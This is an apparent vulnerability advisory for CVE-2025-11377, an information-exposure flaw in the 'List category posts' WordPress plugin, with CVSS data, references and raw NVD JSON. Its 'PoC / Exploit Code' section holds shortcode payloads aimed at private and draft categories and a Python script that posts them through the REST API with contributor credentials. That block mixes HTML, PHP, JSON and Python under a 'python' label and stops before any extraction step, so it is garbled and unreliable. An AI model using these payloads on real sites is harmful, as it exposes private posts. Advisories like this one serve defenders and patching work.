CVE-2025-11377

Description

The List category posts plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 0.92.0 via the 'catlist' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

List category posts插件 ≤ 0.92.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- WordPress Post/Page Content -->
[catlist]

<!-- Specific category with all posts -->
[catlist category_name="private-category"]

<!-- Using shortcode in PHP template or via REST API -->
<?php echo do_shortcode('[catlist]'); ?>

<!-- XML-RPC or REST API exploitation -->
<!-- POST /wp-json/wp/v2/posts/ -->
{
    "content": "[catlist category_name='draft-category']",
    "status": "draft"
}

<!-- Automated enumeration script -->
import requests

target = 'http://vulnerable-site.com'
categories = ['private', 'draft', 'protected', 'confidential']

for cat in categories:
    payload = f"[catlist category_name='{cat}']"
    # Send request with contributor-level auth
    response = requests.post(
        f'{target}/wp-json/wp/v2/posts/',
        json={'content': payload, 'status': 'draft'},
        auth=('attacker_contributor', 'password')
    )
    # Extract exposed content from response

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11377
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11377
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11377/
[4] VulDB https://vuldb.com/cve/CVE-2025-11377
[5] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3386680%40list-category-posts&new=3386680%40list-category-posts&sfp_email=&sfph_mail=
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/52666087-3ecc-4901-8902-042179ae97fc?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11377", "sourceIdentifier": "[email protected]", "published": "2025-11-01T05:16:02.037", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The List category posts plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 0.92.0 via the 'catlist' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3386680%40list-category-posts&new=3386680%40list-category-posts&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/52666087-3ecc-4901-8902-042179ae97fc?source=cve", "source": "[email protected]"}]}}